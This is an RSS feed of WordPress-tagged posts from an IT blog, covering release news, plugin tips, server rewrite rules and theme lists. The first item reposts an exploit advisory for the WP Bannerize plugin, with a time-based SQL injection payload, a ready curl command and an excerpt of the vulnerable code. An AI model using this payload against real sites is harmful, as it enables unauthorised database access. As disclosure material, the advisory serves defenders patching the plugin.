<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>GO IT WORLD &#124; IT TECH &#124; IT NEWS &#187; wordpress</title>
	<atom:link href="http://www.goitworld.com/tag/wordpress/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.goitworld.com</link>
	<description>goitworld.com</description>
	<lastBuildDate>Tue, 10 Jan 2012 10:03:06 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.1.2</generator>
		<item>
		<title>WordPress WP Bannerize plugin &lt;= 2.8.7 SQL Injection Vulnerability</title>
		<link>http://www.goitworld.com/wordpress-wp-bannerize-plugin-2-8-7-sql-injection-vulnerability/</link>
		<comments>http://www.goitworld.com/wordpress-wp-bannerize-plugin-2-8-7-sql-injection-vulnerability/#comments</comments>
		<pubDate>Sun, 02 Oct 2011 11:11:40 +0000</pubDate>
		<dc:creator>jason</dc:creator>
				<category><![CDATA[Application Security]]></category>
		<category><![CDATA[sql injection]]></category>
		<category><![CDATA[vulnerability]]></category>
		<category><![CDATA[wordpress]]></category>
		<category><![CDATA[wp bannerize plugin]]></category>

		<guid isPermaLink="false">http://www.goitworld.com/wordpress-wp-bannerize-plugin-2-8-7-sql-injection-vulnerability/</guid>
		<description><![CDATA[<p style="float: right;margin: 4px;">


</p><blockquote><p># Exploit Title: WordPress WP Bannerize plugin &#60;= 2.8.7 SQL Injection Vulnerability     <br /># Date: 2011-09-22      <br /># Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)      <br /># Software Link: <a href="http://downloads.wordpress.org/plugin/wp-bannerize.zip">http://downloads.wordpress.org/plugin/wp-bannerize.zip</a>      <br /># Version: 2.8.7 (tested)      <br />&#160; <br />&#8212;&#8212;&#8212;&#8212;&#8212;      <br />PoC (POST data)      <br />&#8212;&#8212;&#8212;&#8212;&#8212;      <br /><a href="http://www.site.com/wp-content/plugins/wp-bannerize/ajax_sorter.php">http://www.site.com/wp-content/plugins/wp-bannerize/ajax_sorter.php</a>      <br /> limit=1&#38;offset=1&#38;item[]=-1 AND 1=IF(2&#62;1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)      <br />&#160; <br />e.g.      <br />curl &#8211;data &#34;limit=1&#38;offset=1&#38;item[]=-1 AND 1=IF(2&#62;1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)&#34; -H &#34;X-Requested-With:XMLHttpRequest&#34; <a href="http://www.site.com/wp-content/plugins/wp-bannerize/ajax_sorter.php">http://www.site.com/wp-content/plugins/wp-bannerize/ajax_sorter.php</a>      <br />&#160; <br />&#8212;&#8212;&#8212;&#8212;&#8212;      <br />Vulnerable code      <br />&#8212;&#8212;&#8212;&#8212;&#8212;      <br />if ( @isset($_SERVER['HTTP_X_REQUESTED_WITH']) ) {      <br />&#160;&#160;&#160; &#8230;      <br />&#160;&#160;&#160; $limit = intval($_POST['limit']);      <br />&#160;&#160;&#160; $page_offset = (intval($_POST['offset']) &#8211; 1) *</p></blockquote><p>&#8230; <a href="http://www.goitworld.com/wordpress-wp-bannerize-plugin-2-8-7-sql-injection-vulnerability/" class="read_more">Read the rest</a></p>]]></description>
		<wfw:commentRss>http://www.goitworld.com/wordpress-wp-bannerize-plugin-2-8-7-sql-injection-vulnerability/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>WordPress 3.1.3 version publish</title>
		<link>http://www.goitworld.com/wordpress-3-1-3-version-publish/</link>
		<comments>http://www.goitworld.com/wordpress-3-1-3-version-publish/#comments</comments>
		<pubDate>Sun, 29 May 2011 02:00:49 +0000</pubDate>
		<dc:creator>jason</dc:creator>
				<category><![CDATA[IT News World]]></category>
		<category><![CDATA[news]]></category>
		<category><![CDATA[wordpress]]></category>
		<category><![CDATA[wordpress 3.1.3]]></category>

		<guid isPermaLink="false">http://www.goitworld.com/wordpress-3-1-3-version-publish/</guid>
		<description><![CDATA[<p><a href="http://wordpress.org/download/">WordPress 3.1.3</a> is available now and is a security update for all previous versions. It contains the following security fixes and enhancements:</p>
<ul>
<li>Various security hardening by <a href="http://www.buayacorp.com">Alexander Concha</a>. </li>
<li>Taxonomy query hardening by <a href="http://johnlamansky.com/wordpress">John Lamansky</a>. </li>
<li>Prevent sniffing out user names of non-authors by using canonical redirects. Props <a href="http://www.talsoft.com.ar">Verónica Valeros</a>. </li>
<li>Media security fixes by Richard Lundeen of <a href="http://www.microsoft.com/">Microsoft</a>, Jesse Ou of <a href="http://www.microsoft.com/">Microsoft</a>, and <a href="http://www.microsoft.com/security/msrc/default.aspx">Microsoft Vulnerability Research</a>. </li>
<li>Improves file upload security on hosts with dangerous security settings. </li>
<li>Cleans up old WordPress import files if the import does not finish. </li>
<li>Introduce</li></ul><p>&#8230; <a href="http://www.goitworld.com/wordpress-3-1-3-version-publish/" class="read_more">Read the rest</a></p>]]></description>
		<wfw:commentRss>http://www.goitworld.com/wordpress-3-1-3-version-publish/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>9 ways to make WordPress easier to use for your clients</title>
		<link>http://www.goitworld.com/9-ways-to-make-wordpress-easier-to-use-for-your-clients/</link>
		<comments>http://www.goitworld.com/9-ways-to-make-wordpress-easier-to-use-for-your-clients/#comments</comments>
		<pubDate>Fri, 26 Feb 2010 03:52:17 +0000</pubDate>
		<dc:creator>jason</dc:creator>
				<category><![CDATA[Wordpress Tools]]></category>
		<category><![CDATA[easier]]></category>
		<category><![CDATA[tinymce]]></category>
		<category><![CDATA[widgets]]></category>
		<category><![CDATA[wordpress]]></category>

		<guid isPermaLink="false">http://www.goitworld.com/9-ways-to-make-wordpress-easier-to-use-for-your-clients/</guid>
		<description><![CDATA[<p>If you use WordPress as a CMS for your clients’ websites, you’ve probably faced that issue: regular people find WordPress hard to use. Yes, it is quite user-friendly, but apparently not enough for people who double-click on links when browsing or worst, enter their website’s url in Google to get there. To make it easier for these people to maintain their own website, I would suggest the following tips.</p>
<h5>1. Install an extended version of TinyMCE</h5>
<p><img alt="tinymce advanced" src="http://www.designer-daily.com/wp-content/uploads/2009/10/tiny-mce-advanced.jpg" width="450" height="155" /></p>
<p>This is one of the first things I realize that the person who will maintain the website is not internet-saavy. To avoid annoying&#8230; <a href="http://www.goitworld.com/9-ways-to-make-wordpress-easier-to-use-for-your-clients/" class="read_more">Read the rest</a></p>]]></description>
		<wfw:commentRss>http://www.goitworld.com/9-ways-to-make-wordpress-easier-to-use-for-your-clients/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>WordPress Seo Plugin &#8211; SEO Smart Links</title>
		<link>http://www.goitworld.com/wordpress-seo-plugin-seo-smart-links/</link>
		<comments>http://www.goitworld.com/wordpress-seo-plugin-seo-smart-links/#comments</comments>
		<pubDate>Thu, 25 Feb 2010 10:09:41 +0000</pubDate>
		<dc:creator>jason</dc:creator>
				<category><![CDATA[Wordpress Plugins]]></category>
		<category><![CDATA[plugin]]></category>
		<category><![CDATA[seo]]></category>
		<category><![CDATA[smart links]]></category>
		<category><![CDATA[wordpress]]></category>

		<guid isPermaLink="false">http://www.goitworld.com/wordpress-seo-plugin-seo-smart-links/</guid>
		<description><![CDATA[<p><strong>SEO</strong> Smart Links provides automatic <strong>SEO</strong> benefits for your site in addition to custom keyword lists, nofollow and much more.</p>
<p><strong>SEO</strong> Smart Links can automatically link keywords and phrases in your posts and comments with corresponding posts, pages, categories and tags on your blog.</p>
<p>Further <strong>SEO</strong> Smart links allows you to set up your own keywords and set of matching URLs. Finally <strong>SEO</strong> Smart links allows you to set nofollow attribute and open links in new window.</p>
<p>It is a perfect solution to get your blog posts interlinked or add affiliate links to other sites.</p>
<p>Everything happens completely transparent, and&#8230; <a href="http://www.goitworld.com/wordpress-seo-plugin-seo-smart-links/" class="read_more">Read the rest</a></p>]]></description>
		<wfw:commentRss>http://www.goitworld.com/wordpress-seo-plugin-seo-smart-links/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>mod_rewrite with Fedora 10 and ISPConfig for WordPress</title>
		<link>http://www.goitworld.com/mod_rewrite-with-fedora-10-and-ispconfig-for-wordpress/</link>
		<comments>http://www.goitworld.com/mod_rewrite-with-fedora-10-and-ispconfig-for-wordpress/#comments</comments>
		<pubDate>Wed, 24 Feb 2010 11:23:51 +0000</pubDate>
		<dc:creator>jason</dc:creator>
				<category><![CDATA[Wordpress Tools]]></category>
		<category><![CDATA[ispconfig]]></category>
		<category><![CDATA[mod_rewrite]]></category>
		<category><![CDATA[wordpress]]></category>

		<guid isPermaLink="false">http://www.goitworld.com/mod_rewrite-with-fedora-10-and-ispconfig-for-wordpress/</guid>
		<description><![CDATA[<p>This relates to Fedora 10 and ISPConfig 3.0.1 set up as described in <a href="http://www.howtoforge.org/perfect-server-fedora-10-ispconfig-3">this HowtoForge post</a> One of my colleagues recently got interested in offering our clients WordPress as a content management system, so he&#8217;s been trying it out. Yesterday he found out that if he wanted to change the permalink style in WordPress he needed write access to .htaccess, which he didn&#8217;t have because the user rights haven&#8217;t been set up very well there. So I gave him write access by using </p>
<blockquote><p>chown daemon:daemon .htaccess</p>
</blockquote>
<p>Unfortunately this resulted in a 500 Interal Server Error. Looking at&#8230; <a href="http://www.goitworld.com/mod_rewrite-with-fedora-10-and-ispconfig-for-wordpress/" class="read_more">Read the rest</a></p>]]></description>
		<wfw:commentRss>http://www.goitworld.com/mod_rewrite-with-fedora-10-and-ispconfig-for-wordpress/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Please immediately upgrade your wordpress to 2.8.4</title>
		<link>http://www.goitworld.com/please-immediately-upgrade-your-wordpress-to-2-8-4/</link>
		<comments>http://www.goitworld.com/please-immediately-upgrade-your-wordpress-to-2-8-4/#comments</comments>
		<pubDate>Thu, 13 Aug 2009 03:20:05 +0000</pubDate>
		<dc:creator>jason</dc:creator>
				<category><![CDATA[IT News World]]></category>
		<category><![CDATA[upgrade]]></category>
		<category><![CDATA[vulnerability]]></category>
		<category><![CDATA[wordpress]]></category>

		<guid isPermaLink="false">http://www.goitworld.com/please-immediately-upgrade-your-wordpress-to-2-8-4/</guid>
		<description><![CDATA[<p>A vulnerability was discovered: a specially crafted URL could be requested that would allow an attacker to bypass a security check to verify a user requested a password reset. As a result, the first account without a key in the database (usually the admin account) would have its password reset and a new password would be emailed to the account owner. This doesn’t allow remote access, but it is very annoying.</p>
<p>We fixed this problem last night and have been testing the fixes and looking for other problems since then. <a href="http://wordpress.org/download/">Version 2.8.4 which fixes all known problems is now</a>&#8230; <a href="http://www.goitworld.com/please-immediately-upgrade-your-wordpress-to-2-8-4/" class="read_more">Read the rest</a></p>]]></description>
		<wfw:commentRss>http://www.goitworld.com/please-immediately-upgrade-your-wordpress-to-2-8-4/feed/</wfw:commentRss>
		<slash:comments>6</slash:comments>
		</item>
		<item>
		<title>Nginx rewrite rule for wordpress</title>
		<link>http://www.goitworld.com/nginx-rewrite-rule-for-wordpress/</link>
		<comments>http://www.goitworld.com/nginx-rewrite-rule-for-wordpress/#comments</comments>
		<pubDate>Sat, 13 Jun 2009 05:57:43 +0000</pubDate>
		<dc:creator>jason</dc:creator>
				<category><![CDATA[The Wordpress World]]></category>
		<category><![CDATA[nginx rewrite]]></category>
		<category><![CDATA[rewrite rule]]></category>
		<category><![CDATA[wordpress]]></category>

		<guid isPermaLink="false">http://www.goitworld.com/nginx-rewrite-rule-for-wordpress/</guid>
		<description><![CDATA[<p>If your blog system is wordpress on apache, and you use rewrite rule for it. I&#8217;m looking for a way to implement WordPress&#8217;s simple htaccess pretty url rules for Nginx.</p>
<p>.htaccess file:   <br /># BEGIN WordPress    <br />RewriteEngine On    <br />RewriteBase /    <br />RewriteCond %{REQUEST_FILENAME} !-f    <br />RewriteCond %{REQUEST_FILENAME} !-d    <br />RewriteRule . /index.php [L]    <br /># END WordPress</p>
<p>Fllow is my nginx’s rewrite rule for wordpress:   <br />location / {    <br />index index.php index.html;    <br />if (!-e $request_filename)    <br />{    <br />rewrite ^/(.+)$ /index.php?p=$1 last;    <br />}    <br />}</p>
]]></description>
		<wfw:commentRss>http://www.goitworld.com/nginx-rewrite-rule-for-wordpress/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>WordPress 2.8 will be Realeased</title>
		<link>http://www.goitworld.com/wordpress-28-will-be-realeased/</link>
		<comments>http://www.goitworld.com/wordpress-28-will-be-realeased/#comments</comments>
		<pubDate>Thu, 04 Jun 2009 01:40:10 +0000</pubDate>
		<dc:creator>jason</dc:creator>
				<category><![CDATA[The Wordpress World]]></category>
		<category><![CDATA[release]]></category>
		<category><![CDATA[update]]></category>
		<category><![CDATA[wordpress]]></category>

		<guid isPermaLink="false">http://www.goitworld.com/wordpress-28-will-be-realeased/</guid>
		<description><![CDATA[<p>I want upgrade to the wordpress relase Beta2 in tommorow. But I found the new version will be released in recent days, so you want to wait a few days.</p>
<p>The release date for WordPress 2.8 has almost been confirmed, according to the latest blog post on the <a href="http://wordpress.org/development/2009/06/summary-of-wordpress-dev-irc-meetup-for-20090603/">WordPress development blog</a>, the target date for releasing WordPress 2.8 is June 10th.</p>
<p>However this is only a target date and may not end up as being the release date in the end, however it would be good to see it released soon, considering the good number of features it has.&#8230; <a href="http://www.goitworld.com/wordpress-28-will-be-realeased/" class="read_more">Read the rest</a></p>]]></description>
		<wfw:commentRss>http://www.goitworld.com/wordpress-28-will-be-realeased/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>How to Install Google Sitemap XML for WordPress</title>
		<link>http://www.goitworld.com/how-to-install-google-sitemap-xml-for-wordpress/</link>
		<comments>http://www.goitworld.com/how-to-install-google-sitemap-xml-for-wordpress/#comments</comments>
		<pubDate>Mon, 25 May 2009 05:59:06 +0000</pubDate>
		<dc:creator>jason</dc:creator>
				<category><![CDATA[Wordpress Plugins]]></category>
		<category><![CDATA[ask]]></category>
		<category><![CDATA[google]]></category>
		<category><![CDATA[seo]]></category>
		<category><![CDATA[sitemap]]></category>
		<category><![CDATA[wordpress]]></category>
		<category><![CDATA[xml]]></category>
		<category><![CDATA[yahoo]]></category>

		<guid isPermaLink="false">http://www.goitworld.com/how-to-install-google-sitemap-xml-for-wordpress/</guid>
		<description><![CDATA[<p>I find a plugin of <strong>wordpress</strong>. This <strong>plugin</strong> will create a <strong>Google</strong> <strong>sitemaps</strong> compliant XML-<strong>Sitemap</strong> of your <strong>WordPress</strong> blog. It supports all of the WordPress generated pages as well as custom ones. Everytime you edit or create a post, your sitemap is updated and all major search engines that support the sitemap protocol, like <strong>ASK</strong>.com, <strong>Google</strong>, MSN Search and YAHOO, are notified about the update.</p>
<p>Related Links:</p>
<ul>
<li><a href="http://www.arnebrachhold.de/projects/wordpress-plugins/google-xml-sitemaps-generator/">Plugin Homepage</a></li>
<li><a href="http://www.arnebrachhold.de/projects/wordpress-plugins/google-xml-sitemaps-generator/changelog/">Changelog</a></li>
<li><a href="http://www.arnebrachhold.de/2006/04/07/google-sitemaps-faq-sitemap-issues-errors-and-problems/">Plugin and sitemaps FAQ</a></li>
<li><a href="http://wordpress.org/tags/google-sitemap-generator">Support Forum</a></li>
</ul>
<p>Download Url   <br /><a title="http://downloads.wordpress.org/plugin/google-sitemap-generator.3.1.2.zip" href="http://downloads.wordpress.org/plugin/google-sitemap-generator.3.1.2.zip">http://downloads.wordpress.org/plugin/google-sitemap-generator.3.1.2.zip</a></p>
<p>Install:</p>
<li>Upload the full directory into your wp-content/plugins directory </li>
<li>Use your favorite FTP program to create two</li><p>&#8230; <a href="http://www.goitworld.com/how-to-install-google-sitemap-xml-for-wordpress/" class="read_more">Read the rest</a></p>]]></description>
		<wfw:commentRss>http://www.goitworld.com/how-to-install-google-sitemap-xml-for-wordpress/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Top 10 free wordpress theme sites</title>
		<link>http://www.goitworld.com/top-10-free-wordpress-theme-sites/</link>
		<comments>http://www.goitworld.com/top-10-free-wordpress-theme-sites/#comments</comments>
		<pubDate>Fri, 02 Jan 2009 14:02:02 +0000</pubDate>
		<dc:creator>jason</dc:creator>
				<category><![CDATA[Wordpress Themes]]></category>
		<category><![CDATA[free]]></category>
		<category><![CDATA[template]]></category>
		<category><![CDATA[themes]]></category>
		<category><![CDATA[wordpress]]></category>

		<guid isPermaLink="false">http://www.goitworld.com/top-10-free-wordpress-theme-sites/</guid>
		<description><![CDATA[<p>Today I will recommend 10 website of providing free wordpress theme for everyone.</p>
<p>WordPress Official Website.  There are more than 500 templates,and more than more than 2,136,215 downloads<br />
<a title="http://wordpress.org/extend/themes/" href="http://wordpress.org/extend/themes/">http://wordpress.org/extend/themes/</a></p>
<p>There are more than 1000 templates.  Here you can find it what you want.<br />
<a title="http://www.wpthemes360.com/" href="http://www.wpthemes360.com/">http://www.wpthemes360.com/</a></p>
<p>There are more than 140 wp templates.  The number is not many,but there are many beautiful templates.<br />
<a title="http://wordpressthemesbase.com/" href="http://wordpressthemesbase.com/">http://wordpressthemesbase.com/</a></p>
<p>There are all kinds of wordpress templates to choose from and they are all for free to download.<br />
Free WordPress Theme Site started in 2008 as a resource&#8230; <a href="http://www.goitworld.com/top-10-free-wordpress-theme-sites/" class="read_more">Read the rest</a></p>]]></description>
		<wfw:commentRss>http://www.goitworld.com/top-10-free-wordpress-theme-sites/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
	</channel>
</rss>

